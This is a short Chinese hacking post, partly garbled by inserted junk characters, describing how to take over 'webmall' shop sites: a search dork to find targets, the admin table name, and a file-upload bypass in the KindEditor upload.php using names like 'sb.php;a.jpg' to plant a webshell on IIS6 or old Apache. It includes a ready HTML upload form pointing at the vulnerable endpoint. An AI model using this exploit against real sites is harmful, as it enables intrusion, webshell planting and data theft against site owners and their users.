关键字:inurl:webmall/detail.php?id* V- q: I- |7 W) M. l4 G
5 n' w5 {' M0 h
数据表:pwn_base_admin
+ @+ I, \) L( J; M% p
/ b, e( T/ X" ^& ]5 v关于拿shell
0 S' {' _( O+ z' }$ B
" Q, X" m' N" n5 k; E1 ]首先登录后台admin.php
2 @) w( J& i' S) H $ s1 |% L) k; i' z; Y1 b
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。! K2 S0 s$ \# H6 Q
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg0 Z3 l! h+ g! E% [
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
* Q- P$ y" _8 a/ f1 R- w- n0 b<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
, M) ]) A/ Y6 c S<input type="text" name="fileName" value="sb.php;a.jpg" /> $ r& H, J% [( f
<input type="hidden" name="attachPath" value="news/pics/" /> $ Z* z/ v; V) @7 D, ]; `
<input type="file" name="fileData" size="14" /></td> , f2 o" \* C. }( O& D" |* W# Z
<input type="submit" name="button" value="确定" /> + i7 V {+ _3 @' |3 [& b8 m
</form>3 \$ n0 K! C/ ~+ a6 A( _8 P
( U, K* F. j4 ]0 L首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。- |9 Z; u+ _1 t3 W* P
1 J, Z8 m) }# ?9 l
|